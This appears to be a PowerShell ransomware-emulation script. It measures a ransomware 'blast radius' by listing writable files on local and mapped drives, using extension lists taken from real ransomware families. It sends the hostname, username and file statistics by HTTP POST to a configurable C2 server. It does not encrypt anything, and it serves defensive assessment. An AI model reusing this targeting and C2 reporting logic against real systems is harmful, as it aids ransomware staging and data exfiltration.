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- Begin {
- # Define Variables
- $EnumerateTargets=@()
- $files=@()
- $AffectedFiles=@()
- $C2Server = '' # ChangeMe
- $C2Port = '1337' # ChangeMe
- $C2Schema = 'http://' # ChangeMe
- $C2Payload = ""
- $Threads = 50
- # Sophistication Emulation Range (1-3)
- # 1 = Basic: Recursively Enumerates Down Local Drives and Mapped Drives exactly as they are mapped
- # 2 = Intermediate: Basic + Enumerates Network Locations/Shortcuts + Attempts to walk up/down network locations - NOT YET IMPLEMENTED
- # 3 = Sophisticated: Intermediate + Scans local network for SMB Shares to enumerate starting at root nodes - NOT YET IMPLEMENTED
- $SophisticationLevel = 1
- # Enumeration Filter Criteria
- # Blacklist = Search all files excepte those filters in the blacklist
- # Whitelist = Only search files matchines filters in the whitelist
- # None = DO not use any whitelist
- $EnumerationFilter = "Whitelist"
- # Blacklist derived from sodinokibi ransomware
- $Blacklist = @("msstyles", "icl", "idx", "rtp", "sys", "nomedia", "dll", "hta", "cur", "lock", "cpl", "ics", "hlp", "com", "spl", "msi", "key", "mpa", "rom", "drv", "bat", "386", "adv", "diagcab", "mod", "scr", "theme", "ocx", "prf", "cab", "diagcfg", "msu", "cmd", "ico", "msc", "ani", "icns", "diagpkg", "deskthemepack", "wpx", "msp", "bin", "themepack", "shs", "nls", "exe", "lnk", "ps1", "ldf", "ntuser.dat", "desktop.ini", "thumbs.db", "iconcache.db", "ntuser.ini", "ntldr", "bootfont.bin", "ntuser.dat.log", "bootsect.bak", "boot.ini", "autorun.inf")
- # Whitelist derived from teslacrypt and then added additional common extensions
- $Whitelist = @("pdb", "dat", "json", "7z", "zip", "map", "m2", "rb", "jpg", "rar", "wmo", "mcmeta", "png", "cdr", "m4a", "itm", "vfs0", "jpeg", "indd", "wma", "sb", "mpqge", "txt", "ai", "avi", "fos", "kdb", "p7c", "eps", "wmv", "mcgame", "db0", "p7b", "pdf", "csv", "vdf", "DayZProfile", "p12", "pdd", "d3dbsp", "ztmp", "rofl", "pfx", "psd", "sc2save", "sis", "hkx", "pem", "dbfv", "sie", "sid", "bar", "crt", "mdf", "sum", "ncf", "upk", "cer", "wb2", "ibank", "menu", "das", "der", "rtf", "t13", "layout", "iwi", "x3f", "wpd", "t12", "dmp", "litemod", "srw", "dxg", "qdf", "blob", "asset", "pef", "xf", "gdb", "esm", "forge", "ptx", "dwg", "tax", "001", "ltx", "r3d", "pst", "pkpass", "vtf", "bsa", "rw2", "accdb", "bc6", "dazip", "apk", "rwl", "mdb", "bc7", "fpk", "re4", "raw", "pptm", "bkp", "mlx", "sav", "raf", "pptx", "qic", "kf", "lbf", "orf", "ppt", "bkf", "iwd", "slm", "nrw", "xlk", "sidn", "vpk", "bik", "mrwref", "xlsb", "sidd", "tor", "epk", "mef", "xlsm", "mddata", "psk", "rgss3a", "erf", "xlsx", "itl", "rim", "pak", "kdc", "xls", "itdb", "w3x", "big", "dcr", "wps", "icxs", "fsh", "unity3d", "cr2", "docm", "hvpl", "ntl", "wotreplay", "crw", "docx", "hplg", "arch00", "xxx", "bay", "doc", "hkdb", "lvl", "desc", "sr2", "odb", "mdbackup", "snx", "py", "srf", "odc", "syncdb", "cfr", "m3u", "arw", "odm", "gho", "ff", "flv", "3fr", "odp", "cas", "vpp_pc", "js", "dng", "ods", "svg", "lrf", "css", "jpe", "odt", "pps", "xlr", "java", "h", "sh", "vbs", "py", "swift", "ps1", "crt", "cer", "key", "bak", "bkup", "tex", "wks", "m4v", "kbds", "mpeg", "mpg", "mov", "php", "asp", "aspx", "pl", "js", "jsp", "xhtml", "bmp", "gif", "*ico", "svg", "jar", "sql", "tar", "xml", "mp3", "wav", "ogg")
- }
- Process {
- # Build String to be sent as C2 Payload, essentially just console output
- $C2Payload += ("Simulating Ransomware Infection Routine!`n")
- $C2Payload += ("Sophistication Level: " + $SophisticationLevel + "`n")
- $C2Payload += ("Enumeration Filter Criteria: " + $EnumerationFilter + "`n")
- $C2Payload += ("Hostname: " + $env:COMPUTERNAME + "`n")
- $C2Payload += ("Current User: " + $env:USERDOMAIN + '\' + $env:USERNAME + "`n")
- Write-Host $C2Payload
- # Attempt to reach the C2 Server
- if($C2Server){
- Try {
- $C2Status = Invoke-WebRequest -uri ($C2Schema + $C2Server + ":" + $C2Port + "/Status") -Method GET
- Write-Verbose "C2 Connection: OK"
- } Catch {
- Write-Warning "C2 Server is not reachable"
- Exit(1)
- }
- }
- Function ThreadedEnumeration {
- [CmdletBinding()]
- param(
- [Parameter(
- Position=0,
- HelpMessage='System or Network Drive to Enumerate')]
- [String]$Drive,
- [Parameter(
- Position=1,
- HelpMessage='Maximum number of threads at the same time (Default=50)')]
- [Int32]$Threads=50,
- [Parameter(
- Position=2,
- HelpMessage='Whitelist of allowed file extensions')]
- [Array]$Whitelist
- )
- Begin{
- Write-Verbose -Message "Script started at $(Get-Date)"
- $BlastRadius = @()
- }
- Process{
- function Chunk-Array
- {
- param($objIn,[int]$parts,[int]$size)
- if ($parts) {
- $PartSize = [Math]::Ceiling($objIn.count / $parts)
- }
- if ($size) {
- $PartSize = $size
- $parts = [Math]::Ceiling($objIn.count / $size)
- }
- $objOut = New-Object 'System.Collections.Generic.List[psobject]'
- for ($i=1; $i -le $parts; $i++) {
- $start = (($i-1)*$PartSize)
- $end = (($i)*$PartSize) - 1
- if ($end -ge $objIn.count) {$end = $objIn.count -1}
- $objOut.Add(@($objIn[$start..$end]))
- }
- return ,$objOut
- }
- # Scriptblock --> will run in threads...
- [ScriptBlock]$ScriptBlock = {
- Param(
- $chunk,
- $Whitelist=$Null
- )
- # Check For Write Access
- $chunk | ForEach-Object {
- if ($Whitelist){
- if (($Whitelist.Contains($_[-3..-1] -join '')) -and ($_[-4] -eq '.')) {
- Try{
- [System.IO.File]::OpenWrite($_).close() # <----- Check does not affect metadata (last access,modifed,created timestamps) of file
- $writable = Get-Item $_ | select FullName, Name, Length, Extension
- [PSCustomObject] @{
- FullName = $writable.FullName
- Name = $writable.Name
- Size = $writable.Length
- Extension = $writable.Extension
- }
- } Catch{
- Write-Verbose ("No Write Permission on: " + $_)
- } # End Try Catch
- } # End If Whitelist Contains
- } else {
- Try{
- [System.IO.File]::OpenWrite($_).close() # <----- Check does not affect metadata (last access,modifed,created timestamps) of file
- $writable = Get-Item $_ | select FullName, Name, Length, Extension
- [PSCustomObject] @{
- FullName = $writable.FullName
- Name = $writable.Name
- Size = $writable.Length
- Extension = $writable.Extension
- }
- } Catch{
- Write-Verbose ("No Write Permission on: " + $_)
- } # End Try Catch
- } # End If/Else WhiteList
- } # End Foreach Chunk
- } # End ScriptBlock
- Write-Verbose -Message "Setting up RunspacePool..."
- # Create RunspacePool and Jobs
- $RunspacePool = [System.Management.Automation.Runspaces.RunspaceFactory]::CreateRunspacePool(1, $Threads, $Host)
- $RunspacePool.ApartmentState = "MTA"
- $RunspacePool.Open()
- [System.Collections.ArrayList]$Jobs = @()
- Write-Verbose -Message "Setting up Jobs..."
- # This is actually WAY faster than Get-ChildItem
- $dir = cmd /r dir $Drive /s /b /a:-d
- $chunks = Chunk-Array -objIn $dir -parts 150
- foreach($chunk in $chunks)
- {
- # Create job
- $Job = [System.Management.Automation.PowerShell]::Create()
- $null = $Job.AddScript($ScriptBlock)
- $null = $Job.AddArgument($chunk)
- if ($Whitelist) {$null = $Job.AddArgument($Whitelist)}
- $null = $job
- $Job.RunspacePool = $RunspacePool
- $JobObj = [PSCustomObject]@{
- Pipe = $job;
- Result = $job.BeginInvoke()
- }
- # Add job to collection
- [void]$Jobs.Add($JobObj)
- }
- Write-Verbose -Message "Waiting for jobs to complete & starting to process results..."
- # Total jobs to calculate percent complete, because jobs are removed after they are processed
- $Jobs_Total = $Jobs.Count
- # Process results, while waiting for other jobs
- Do {
- # Get all jobs, which are completed
- $Jobs_ToProcess = $Jobs | Where-Object -FilterScript {$_.Result.IsCompleted}
- # If no jobs finished yet, wait 500 ms and try again
- if($null -eq $Jobs_ToProcess)
- {
- Write-Verbose -Message "No jobs completed yet, wait 5 sec..."
- Start-Sleep -Seconds 5
- continue
- }
- # Get jobs, which are not complete yet
- $Jobs_Remaining = ($Jobs | Where-Object -FilterScript {$_.Result.IsCompleted -eq $false}).Count
- # Catch when trying to divide through zero
- try {
- $Progress_Percent = 100 - (($Jobs_Remaining / $Jobs_Total) * 100)
- }
- catch {
- $Progress_Percent = 100
- }
- Write-Progress -Activity "Waiting for jobs to complete... ($($Threads - $($RunspacePool.GetAvailableRunspaces())) of $Threads threads running)" -Id 1 -PercentComplete $Progress_Percent -Status "$Jobs_Remaining remaining..."
- Write-Verbose -Message "Processing $(if($null -eq $Jobs_ToProcess.Count){"1"}else{$Jobs_ToProcess.Count}) job(s)..."
- # Processing completed jobs
- foreach($Job in $Jobs_ToProcess)
- {
- # Get the result...
- $Job_Result = $Job.Pipe.EndInvoke($Job.Result)
- $Job.Pipe.Dispose()
- # Remove job from collection
- $Jobs.Remove($Job)
- # Check if result is null --> if not, return it
- if($Job_Result.Result)
- {
- $BlastRadius += $Job_Result
- }
- }
- } While ($Jobs.Count -gt 0)
- Write-Verbose -Message "Closing RunspacePool and free resources..."
- # Close the RunspacePool and free resources
- $RunspacePool.Close()
- $RunspacePool.Dispose()
- Write-Verbose -Message "Script finished at $(Get-Date)"
- }
- End{
- Return $BlastRadius
- }
- }
- # Find Network Drives
- $AllDrives = (Get-PSDrive -PSProvider FileSystem | Where-Object {$_.Used -ne 0})
- # If Basic Ransomware
- if ($SophisticationLevel -eq 1) {
- $AllDrives | ForEach-Object {
- if ($_.DisplayRoot) {
- $EnumerateTargets += $_.DisplayRoot
- } else {
- $EnumerateTargets += $_.Root
- }
- }
- }
- # If Intermediate Ransomware
- if ($SophisticationLevel -eq 2) {
- # Enumerate Quick Access Network Shortcuts
- $objSh = New-Object -ComObject shell.application
- $QuickAccess = $objSh.Namespace("shell:::{679f85cb-0220-4080-b29b-5540cc05aab6}").Items() | Select-Object Path
- foreach ($path in $QuickAccess) {
- Try {
- $RootPath = @(get-item $path.Path).Root.FullName
- if ($RootPath -match '\\\\') {$NetworkDrives+=$RootPath}
- } Catch {
- Write-Verbose "Unable To Access Path"
- }
- }
- $EnumerateTargets = $NetworkDrives += $LocalDrives
- $EnumerateTargets = $EnumerateTargets | Sort-Object -Unique
- }
- # Loop Through Drives
- foreach ($target in $EnumerateTargets | Where-Object{Test-Path $_}) {
- Write-Host ("Enumerating " + $target)
- $C2Payload += ("Enumerating " + $target + "`n")
- # Enumerate Files using Filter Style Blacklist or Whitelist
- if ($EnumerationFilter -eq 'Whitelist'){
- $AffectedFiles += ThreadedEnumeration -Drive $target -Threads $Threads -Whitelist $Whitelist -Verbose
- } else {
- $AffectedFiles += ThreadedEnumeration -Drive $target -Threads $Threads -Verbose
- }
- # Attempt to clean up garbage? Make it faster??
- [GC]::Collect()
- }
- $AffectedFiles = $AffectedFiles | Where-Object {$_.FullName -ne $null}
- # Count of Files
- $C2Payload += ("Total Simulated Files Encrypted: " + ('{0:N0}' -f $AffectedFiles.Count) + "`n")
- Write-Host ("Total Simulated Files Encrypted: " + ('{0:N0}' -f $AffectedFiles.Count))
- # Sum of Data Size of all Files
- $TotalData = ($AffectedFiles | Measure-Object -Sum Size).Sum
- if ($TotalData -gt 1GB) {
- Write-Host ("Total Simulated Data Encrypted (GB): " + [System.Math]::Round(($TotalData / 1GB), 2) + "`n")
- $C2Payload += ("Total Simulated Data Encrypted (GB): " + [System.Math]::Round(($TotalData / 1GB), 2) + "`n")
- } else {
- Write-Host ("Total Simulated Data Encrypted (MB): " + [System.Math]::Round(($TotalData / 1MB), 2) + "`n")
- $C2Payload += ("Total Simulated Data Encrypted (MB): " + [System.Math]::Round(($TotalData / 1MB), 2) + "`n")
- }
- # Top File Types by Extension
- $TopTenFileTypes = $AffectedFiles | Group-Object -Property Extension -NoElement | Sort-Object -Property Count -Descending | Select-Object -First 10
- Write-host ($TopTenFileTypes | Out-String)
- $C2Payload += ($TopTenFileTypes | Out-String)
- }
- End {
- # Post Output Report to C2 Server
- if ($C2Server){
- $null = Invoke-WebRequest -Uri ($C2Schema + $C2Server + ":" + $C2Port + "/receive") -Method POST -Body $C2Payload
- }
- # Done
- }
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